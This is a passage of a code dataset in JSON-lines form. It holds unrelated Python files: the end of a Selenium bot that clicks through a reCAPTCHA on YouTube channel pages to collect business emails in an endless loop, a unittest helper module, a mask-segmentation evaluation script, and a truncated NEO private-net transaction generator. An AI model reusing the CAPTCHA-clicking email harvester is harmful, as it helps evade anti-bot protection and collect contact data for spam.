5).until(EC.frame_to_be_available_and_switch_to_it((By.XPATH,\"//iframe[@title='reCAPTCHA']\")))\n WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//span[@id=\"recaptcha-anchor\"]'))).click()\n self.driver.switch_to.default_content()\n sleep(2)\n WebDriverWait(self.driver, 5).until(EC.element_to_be_clickable((By.XPATH, '//button[@id=\"submit-btn\"]'))).click()\n email = WebDriverWait(self.driver, 5).until(EC.presence_of_element_located((By.XPATH, '//a[@id=\"email\"]'))).text\n # email = self.driver.find_element_by_xpath('//a[@id=\"email\"]').text\n return email\n except Exception as e:\n print(e)\n return False\n\n def perform_task(self):\n try:\n self.driver.get(self.channel_link)\n business_email = self.get_email()\n print(business_email)\n except Exception as e:\n print(e)\n\n def run(self):\n while True:\n self.perform_task()\n \n\ndef main():\n my_bot = Bot()\n my_bot.start()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "SS-FS-58/LinkedIn-Auto-Request-Connection", "sub_path": "youtube_business_email.py", "file_name": "youtube_business_email.py", "file_ext": "py", "file_size_in_byte": 3553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "threading.Thread", "line_number": 14, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", 
"line_number": 16, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 16, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 17, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 30, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "selenium.webdriver.FirefoxOptions", "line_number": 37, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.FirefoxProfile", "line_number": 40, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 41, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 59, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 68, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 68, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 68, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.frame_to_be_available_and_switch_to_it", "line_number": 72, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 72, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 73, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 73, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 73, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 73, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 73, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 76, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 76, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 76, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 77, "usage_type": 
"name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 77, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "40506905769", "text": "import os\nimport sys\nimport unittest\nimport warnings\nfrom contextlib import redirect_stderr, redirect_stdout\nfrom io import StringIO\nfrom timeit import Timer\nfrom typing import Any, Callable, Dict, List, Optional, Union\n\nimport numpy\nfrom numpy.testing import assert_allclose\n\n\ndef unit_test_going():\n \"\"\"\n Enables a flag telling the script is running while testing it.\n Avois unit tests to be very long.\n \"\"\"\n going = int(os.environ.get(\"UNITTEST_GOING\", 0))\n return going == 1\n\n\ndef ignore_warnings(warns: List[Warning]) -> Callable:\n \"\"\"\n Catches warnings.\n\n :param warns: warnings to ignore\n \"\"\"\n\n def wrapper(fct):\n if warns is None:\n raise AssertionError(f\"warns cannot be None for '{fct}'.\")\n\n def call_f(self):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", warns)\n return fct(self)\n\n return call_f\n\n return wrapper\n\n\ndef measure_time(\n stmt: Union[str, Callable],\n context: Optional[Dict[str, Any]] = None,\n repeat: int = 10,\n number: int = 50,\n warmup: int = 1,\n div_by_number: bool = True,\n max_time: Optional[float] = None,\n) -> Dict[str, Any]:\n \"\"\"\n Measures a statement and returns the results as a dictionary.\n\n :param stmt: string or callable\n :param context: variable to know in a dictionary\n :param repeat: average over *repeat* experiment\n :param number: number of executions in one row\n :param warmup: number of iteration to do before starting the\n real measurement\n :param div_by_number: divide by the number of executions\n :param max_time: execute the statement until the total goes\n beyond this time (approximatively), *repeat* is ignored,\n *div_by_number* must be set to True\n :return: dictionary\n\n .. runpython::\n :showcode:\n\n from teachcompute.ext_test_case import measure_time\n from math import cos\n\n res = measure_time(lambda: cos(0.5))\n print(res)\n\n See `Timer.repeat `_\n for a better understanding of parameter *repeat* and *number*.\n The function returns a duration corresponding to\n *number* times the execution of the main statement.\n\n .. 
versionchanged:: 0.4\n        Parameter *max_time* was added.\n    \"\"\"\n    if not callable(stmt) and not isinstance(stmt, str):\n        raise TypeError(\n            f\"stmt is not callable or a string but is of type {type(stmt)!r}.\"\n        )\n    if context is None:\n        context = {}\n\n    if isinstance(stmt, str):\n        tim = Timer(stmt, globals=context)\n    else:\n        tim = Timer(stmt)\n\n    if warmup > 0:\n        warmup_time = tim.timeit(warmup)\n    else:\n        warmup_time = 0\n\n    if max_time is not None:\n        if not div_by_number:\n            raise ValueError(\n                \"div_by_number must be set to True if max_time is defined.\"\n            )\n        i = 1\n        total_time = 0\n        results = []\n        while True:\n            for j in (1, 2):\n                number = i * j\n                time_taken = tim.timeit(number)\n                results.append((number, time_taken))\n                total_time += time_taken\n                if total_time >= max_time:\n                    break\n            if total_time >= max_time:\n                break\n            ratio = (max_time - total_time) / total_time\n            ratio = max(ratio, 1)\n            i = int(i * ratio)\n\n        res = numpy.array(results)\n        tw = res[:, 0].sum()\n        ttime = res[:, 1].sum()\n        mean = ttime / tw\n        ave = res[:, 1] / res[:, 0]\n        dev = (((ave - mean) ** 2 * res[:, 0]).sum() / tw) ** 0.5\n        mes = dict(\n            average=mean,\n            deviation=dev,\n            min_exec=numpy.min(ave),\n            max_exec=numpy.max(ave),\n            repeat=1,\n            number=tw,\n            ttime=ttime,\n        )\n    else:\n        res = numpy.array(tim.repeat(repeat=repeat, number=number))\n        if div_by_number:\n            res /= number\n\n        mean = numpy.mean(res)\n        dev = numpy.mean(res**2)\n        dev = (dev - mean**2) ** 0.5\n        mes = dict(\n            average=mean,\n            deviation=dev,\n            min_exec=numpy.min(res),\n            max_exec=numpy.max(res),\n            repeat=repeat,\n            number=number,\n            ttime=res.sum(),\n        )\n\n    if \"values\" in context:\n        if hasattr(context[\"values\"], \"shape\"):\n            mes[\"size\"] = context[\"values\"].shape[0]\n        else:\n            mes[\"size\"] = len(context[\"values\"])\n    else:\n        mes[\"context_size\"] = sys.getsizeof(context)\n    mes[\"warmup_time\"] = warmup_time\n    return mes\n\n\nclass ExtTestCase(unittest.TestCase):\n    _warns = []\n\n    def assertEndsWith(self, string, suffix):\n        if not string.endswith(suffix):\n            raise AssertionError(f\"{string!r} does not end with {suffix!r}.\")\n\n    def assertExists(self, name):\n        if not os.path.exists(name):\n            raise AssertionError(f\"File or folder {name!r} does not exist.\")\n\n    def assertEqualArray(\n        self,\n        expected: numpy.ndarray,\n        value: numpy.ndarray,\n        atol: float = 0,\n        rtol: float = 0,\n    ):\n        self.assertEqual(expected.dtype, value.dtype)\n        self.assertEqual(expected.shape, value.shape)\n        assert_allclose(expected, value, atol=atol, rtol=rtol)\n\n    def assertAlmostEqual(\n        self,\n        expected: numpy.ndarray,\n        value: numpy.ndarray,\n        atol: float = 0,\n        rtol: float = 0,\n    ):\n        if not isinstance(expected, numpy.ndarray):\n            expected = numpy.array(expected)\n        if not isinstance(value, numpy.ndarray):\n            value = numpy.array(value).astype(expected.dtype)\n        self.assertEqualArray(expected, value, atol=atol, rtol=rtol)\n\n    def assertRaise(self, fct: Callable, exc_type: Exception):\n        try:\n            fct()\n        except exc_type as e:\n            if not isinstance(e, exc_type):\n                raise AssertionError(f\"Unexpected exception {type(e)!r}.\")\n            return\n        raise AssertionError(\"No exception was raised.\")\n\n    def assertEmpty(self, value: Any):\n        if value is None:\n            return\n        if len(value) == 0:\n            return\n        raise AssertionError(f\"value is not empty: {value!r}.\")\n\n    def assertNotEmpty(self, value: Any):\n        if value is None:\n            raise AssertionError(f\"value is empty: {value!r}.\")\n        if isinstance(value, (list, dict, tuple, set)):\n            if len(value) == 0:\n                raise AssertionError(f\"value is empty: {value!r}.\")\n\n    def 
assertStartsWith(self, prefix: str, full: str):\n if not full.startswith(prefix):\n raise AssertionError(f\"prefix={prefix!r} does not start string {full!r}.\")\n\n @classmethod\n def tearDownClass(cls):\n for name, line, w in cls._warns:\n warnings.warn(f\"\\n{name}:{line}: {type(w)}\\n {str(w)}\")\n\n def capture(self, fct: Callable):\n \"\"\"\n Runs a function and capture standard output and error.\n\n :param fct: function to run\n :return: result of *fct*, output, error\n \"\"\"\n sout = StringIO()\n serr = StringIO()\n with redirect_stdout(sout):\n with redirect_stderr(serr):\n res = fct()\n return res, sout.getvalue(), serr.getvalue()\n", "repo_name": "sdpython/teachcompute", "sub_path": "teachcompute/ext_test_case.py", "file_name": "ext_test_case.py", "file_ext": "py", "file_size_in_byte": 7441, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "warnings.catch_warnings", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 51, "usage_type": "name"}, {"api_name": "timeit.Timer", "line_number": 94, "usage_type": "call"}, {"api_name": "timeit.Timer", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 164, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 52, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 183, "usage_type": "attribute"}, {"api_name": "numpy.testing.assert_allclose", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 194, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 
200, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 213, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 220, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 234, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 236, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 243, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 244, "usage_type": "call"}, {"api_name": "contextlib.redirect_stdout", "line_number": 245, "usage_type": "call"}, {"api_name": "contextlib.redirect_stderr", "line_number": 246, "usage_type": "call"}]}
+{"seq_id": "69874272088", "text": "import argparse\nimport os\nfrom tqdm import tqdm\nimport numpy as np\nfrom collections import defaultdict\nimport cv2\nimport glob\n\n\ndef calculate_metrics(gen_mask, gt_mask, threshold=0, skip_undetected=False):\n uncertain_zone = np.all(gt_mask == 128, axis=2)\n gt_human_mask = np.any(gt_mask > 0, axis=2) & (~uncertain_zone)\n\n gen_mask_bin = gen_mask > threshold\n gen_mask_bin = gen_mask_bin & (~uncertain_zone)\n\n if gt_human_mask.sum() == 0:\n return defaultdict(lambda: np.nan)\n if skip_undetected and gen_mask_bin.sum() == 0:\n return defaultdict(lambda: np.nan)\n\n overlap_sum = (gen_mask_bin & gt_human_mask).sum()\n union_sum = (gen_mask_bin | gt_human_mask).sum()\n\n gen_mask_soft = gen_mask / 255.0 * (~uncertain_zone).astype(int)\n overlap_sum_soft = (gen_mask_soft * gt_human_mask.astype(int)).sum()\n union_sum_soft = (gen_mask_soft + gt_human_mask.astype(int)).clip(0, 1).sum()\n\n metrics = dict()\n if overlap_sum == 0:\n return defaultdict(lambda: np.nan)\n metrics['iou'] = overlap_sum / union_sum\n metrics['f1'] = 2 * overlap_sum / (union_sum + overlap_sum)\n metrics['precision'] = overlap_sum / gen_mask_bin.sum()\n metrics['recall'] = overlap_sum / gt_human_mask.sum()\n\n metrics['iou_soft'] = overlap_sum_soft / union_sum_soft\n metrics['f1_soft'] = 2 * overlap_sum_soft / (union_sum_soft + overlap_sum_soft)\n # metrics['precision'] = overlap_sum_soft / gen_mask_soft.sum()\n # metrics['recall'] = overlap_sum_soft / gt_human_mask.sum()\n\n return metrics\n\n\ndef eval_dir(gen_masks_dir, gt_masks_dir, threshold=64):\n metric_list = defaultdict(list)\n\n if not os.path.isdir(gen_masks_dir):\n print(f'No directory {gen_masks_dir}')\n return metric_list\n gen_masks_paths = [\n os.path.join(gen_masks_dir, f) for f in os.listdir(gen_masks_dir) if f.endswith('.png')\n ]\n assert len(os.listdir(gt_masks_dir)) >= len(\n gen_masks_paths\n ), f'More generated masks than gt: {len(gen_masks_paths)} vs {gt_masks_dir}'\n\n for gen_mask_path in gen_masks_paths:\n gen_mask = cv2.imread(gen_mask_path, 0)\n assert gen_mask is not None, gen_mask_path\n\n gt_path = os.path.join(gt_masks_dir, os.path.basename(gen_mask_path).replace('_img.png', '.png'))\n gt_mask = cv2.imread(gt_path)\n assert gt_mask is not None, gt_path\n assert gen_mask.shape == gt_mask.shape[:2], (gen_mask.shape, gt_mask.shape)\n\n metrics = calculate_metrics(gen_mask, gt_mask, threshold=threshold)\n for key, value in metrics.items():\n metric_list[key].append(value)\n\n return metric_list\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'gen_mask_dirnames', help='Names of folders with generated masks separated by a comma'\n )\n parser.add_argument('gt_mask_dirname', help='Folder name with ground truth masks')\n parser.add_argument('parent_dir', help='Folder name with ground truth masks')\n parser.add_argument('--csv_dir', help='Where to write results as .csv for each metric')\n args = parser.parse_args()\n\n os.makedirs(args.csv_dir, exist_ok=True)\n assert os.path.isdir(args.parent_dir), f'Not a directory: {args.parent_dir}'\n gen_mask_dirnames = [d.strip() for d in args.gen_mask_dirnames.split(',')]\n\n vid_names = sorted(\n [d for d in os.listdir(args.parent_dir) if os.path.isdir(os.path.join(args.parent_dir, d))]\n )\n metric_rows = defaultdict(lambda: [[''] + vid_names + ['Mean']])\n\n for method in tqdm(gen_mask_dirnames):\n tqdm.write(f'Method in progress: {method}')\n metric_lists = defaultdict(lambda: [method])\n for dir_name in 
vid_names:\n dir_metrics = eval_dir(\n os.path.join(args.parent_dir, dir_name, method),\n os.path.join(args.parent_dir, dir_name, args.gt_mask_dirname),\n )\n for key in set(metric_lists.keys()).union(dir_metrics.keys()):\n metric_lists[key].append(\n np.nanmean(dir_metrics[key]) if len(dir_metrics[key]) > 0 else 0.0\n )\n metric_means = {key: np.nanmean(values[1:]) for key, values in metric_lists.items()}\n for metric in metric_lists:\n metric_rows[metric].append(metric_lists[metric] + [metric_means[metric]])\n tqdm.write(f'Finished!\\n-------------')\n for metric, rows in metric_rows.items():\n np.savetxt(\n os.path.join(args.csv_dir, f'{metric}.csv'),\n np.array(rows).astype(str),\n fmt='%s',\n delimiter=',',\n )\n", "repo_name": "EgorNemchinov/HumanBGSegmentation", "sub_path": "scripts/eval_dir.py", "file_name": "eval_dir.py", "file_ext": "py", "file_size_in_byte": 4609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.all", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 12, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 18, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 20, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 31, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 63, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 91, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 93, "usage_type": "call"}, {"api_name": "tqdm.tqdm.write", "line_number": 94, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 94, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 105, "usage_type": "call"}, {"api_name": "tqdm.tqdm.write", "line_number": 108, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 108, "usage_type": "name"}, {"api_name": "numpy.savetxt", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}]}
+{"seq_id": "39409294307", "text": "#!/usr/bin/env python3\nfrom time import sleep\nimport threading\nimport traceback\nimport sys\nimport argparse\n\nfrom logzero import logger\nfrom neocore.Fixed8 import Fixed8\nfrom neocore.UInt256 import UInt256\nfrom neocore.UInt160 import UInt160\nfrom twisted.internet import reactor, task\n\nfrom neo.Core.Blockchain import Blockchain\nfrom neo.Core.CoinReference import CoinReference\nfrom neo.Core.TX.Transaction import TransactionOutput, ContractTransaction, TXFeeError\nfrom neo.Core.TX.TransactionAttribute import TransactionAttribute, TransactionAttributeUsage\nfrom neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain import LevelDBBlockchain\nfrom neo.Implementations.Wallets.peewee.UserWallet import UserWallet\nfrom neo.Network.NodeLeader import NodeLeader\nfrom neo.Prompt.Commands import Send, Wallet\nfrom neo.Prompt.Utils import get_asset_id, lookup_addr_str, get_asset_amount\nfrom neo.Settings import settings\nfrom neo.SmartContract.ContractParameterContext import ContractParametersContext\nfrom neo.Wallets.utils import to_aes_key\n\nWALLET_PWD = \"nspcc\"\nWALLET_PATH = \"/wallets/wallet\"\nMASTER_WALLET_PWD = \"coz\"\nMASTER_WALLET_PATH = \"/neo-python/neo-privnet.wallet\"\nWALLET_DB_PATH = \"/wallets/db.log\"\nBLOCK_AMOUNT = 10\n\n# user defined params\nTX_FILE = \"/root/raw.txs\"\nPREMADE_NEO = 10\nPREMADE_GAS = 2.0\nTX_NEO = 3\nTX_GAS = 1.0\nTOTAL_AMOUNT = 1000\n\n\ndef read_wallet_db():\n with open(WALLET_DB_PATH, 'r') as f:\n database = f.read().splitlines()\n return database\n\ndef write_raw_db(hashes, path):\n with open(path, 'w') as f:\n for hash in hashes:\n f.write(hash.decode(\"ascii\")+\"\\n\")\n\ndef process_transaction(wallet, contract_tx, scripthash_from=None, scripthash_change=None, fee=None, owners=None, user_tx_attributes=None):\n try:\n tx = wallet.MakeTransaction(tx=contract_tx,\n change_address=scripthash_change,\n fee=fee,\n from_addr=scripthash_from)\n except ValueError:\n print(\"Insufficient funds. 
No unspent outputs available for building the transaction.\\n\"\n \"If you are trying to sent multiple transactions in 1 block, then make sure you have enough 'vouts'\\n.\"\n \"Use `wallet unspent` and `wallet address split`, or wait until the first transaction is processed before sending another.\")\n raise Exception('oh no')\n except TXFeeError as e:\n print(e)\n raise Exception('oh no')\n\n if tx is None:\n print(\"Insufficient funds\")\n raise Exception('oh no')\n\n try:\n input_coinref = wallet.FindCoinsByVins(tx.inputs)[0]\n source_addr = input_coinref.Address\n for order in tx.outputs:\n dest_addr = order.Address\n value = order.Value.ToString() # fixed8\n if order.AssetId == Blockchain.Default().SystemShare().Hash:\n asset_name = 'NEO'\n else:\n asset_name = 'GAS'\n\n if source_addr != dest_addr:\n print(f\"Sending {value} {asset_name} from {source_addr} to {dest_addr}\")\n else:\n print(f\"Returning {value} {asset_name} as change to {dest_addr}\")\n print(\" \")\n\n standard_contract = wallet.GetStandardAddress()\n\n if scripthash_from is not None:\n signer_contract = wallet.GetContract(scripthash_from)\n else:\n signer_contract = wallet.GetContract(standard_contract)\n\n if not signer_contract.IsMultiSigContract and owners is None:\n data = standard_contract.Data\n tx.Attributes = [TransactionAttribute(usage=TransactionAttributeUsage.Script,\n data=data)]\n\n # insert any additional user specified tx attributes\n tx.Attributes = tx.Attributes + user_tx_attributes\n\n context = ContractParametersContext(tx, isMultiSig=signer_contract.IsMultiSigContract)\n wallet.Sign(context)\n\n if context.Completed:\n tx.scripts = context.GetScripts()\n relayed = NodeLeader.Instance().Relay(tx)\n\n if relayed:\n wallet.SaveTransaction(tx)\n return tx\n else:\n print(\"Could not relay tx %s \" % tx.Hash.ToString())\n raise Exception('oh no')\n\n else:\n print(\"Transaction initiated, but the signature is incomplete. 
Use the \`sign\` command with the information below to complete signing.\")\n            print(json.dumps(context.ToJson(), separators=(',', ':')))\n            raise Exception('oh no')\n\n    except Exception as e:\n        print(\"Could not send: %s \" % e)\n        traceback.print_stack()\n        traceback.print_exc()\n\n    return\n\ndef construct_send_many(wallet, outgoing, start, data, asset, amount):\n    logger.info(\"Constructing %s : %d-%d\" % (asset, start, start+outgoing-1))\n    output = []\n    for i in range(outgoing):\n        try:\n            assetId = get_asset_id(wallet, asset)\n            address_to = data[start+i]\n            scripthash_to = lookup_addr_str(wallet, address_to)\n            if scripthash_to is None:\n                logger.debug(\"invalid destination address\")\n                return\n            f8amount = get_asset_amount(amount, assetId)\n            if f8amount is False:\n                logger.debug(\"invalid amount\")\n                return\n            tx_output = TransactionOutput(AssetId=assetId, Value=f8amount, script_hash=scripthash_to)\n            output.append(tx_output)\n        except KeyboardInterrupt:\n            print('Transaction cancelled')\n            return\n    contract_tx = ContractTransaction(outputs=output)\n\n    scripthash_from = None\n    scripthash_change = None\n    owners = None\n    user_tx_attributes = []\n    fee = Fixed8.Zero()\n\n    return [contract_tx, scripthash_from, scripthash_change, fee, owners, user_tx_attributes]\n\ndef create_raw_transaction(walletpath, source, dest, txidNeo, txidGas, n):\n    # const for asset id\n    gas_asset_id = Blockchain.SystemCoin().Hash\n    neo_asset_id = Blockchain.SystemShare().Hash\n\n    # open source wallet for later transaction signing\n    wallet = UserWallet.Open(walletpath, to_aes_key(WALLET_PWD))\n\n    source_script_hash = wallet.ToScriptHash(source)\n    destination_script_hash = wallet.ToScriptHash(dest)\n\n    contract_tx = ContractTransaction()\n    contract_tx.raw_tx = True\n\n    # here we create the vin\n    input1 = CoinReference(prev_hash=UInt256.ParseString(txidNeo), prev_index=int(n))\n    input2 = CoinReference(prev_hash=UInt256.ParseString(txidGas), prev_index=int(n))\n    contract_tx.inputs = [input1, input2]\n\n    # here we create the vout (src [10 NEO] -> { dst [3 NEO]; src [7 NEO] })\n    send_to_destination_output1 = TransactionOutput(AssetId=neo_asset_id, Value=Fixed8.FromDecimal(TX_NEO), script_hash=destination_script_hash)\n    return_change_output1 = TransactionOutput(AssetId=neo_asset_id, Value=Fixed8.FromDecimal(PREMADE_NEO-TX_NEO), script_hash=source_script_hash)\n    return_change_output2 = TransactionOutput(AssetId=gas_asset_id, Value=Fixed8.FromDecimal(TX_GAS), script_hash=source_script_hash)\n    contract_tx.outputs = [send_to_destination_output1, return_change_output1, return_change_output2]\n\n    # time to sign\n    context = ContractParametersContext(contract_tx)\n    wallet.Sign(context)\n\n    # confirmation scripts\n    contract_tx.scripts = context.GetScripts()\n\n    raw_tx = contract_tx.ToArray()\n    return raw_tx\n\ndef construct_raw_many(outgoing, start, data, txidNeo, txidGas):\n    output = []\n    for i in range(outgoing):\n        try:\n            pos = start + i\n            filename = WALLET_PATH + \"%d\" % pos\n            tx = create_raw_transaction(filename, data[pos], data[pos + TOTAL_AMOUNT], txidNeo, txidGas, i)\n            output.append(tx)\n            logger.info(\"Created raw transaction %d\" % pos)\n\n        except KeyboardInterrupt:\n            print('Transaction cancelled')\n            return\n\n    return output\n\ndef main_routine():\n    # Here we wait for the local node to synchronize with the private net\n    while True:\n        if Blockchain.Default().Height != Blockchain.Default().HeaderHeight or Blockchain.Default().Height < 10:\n            logger.info(\"...awaits %s/%s\" % (Blockchain.Default().Height, Blockchain.Default().HeaderHeight))\n            sleep(2)\n
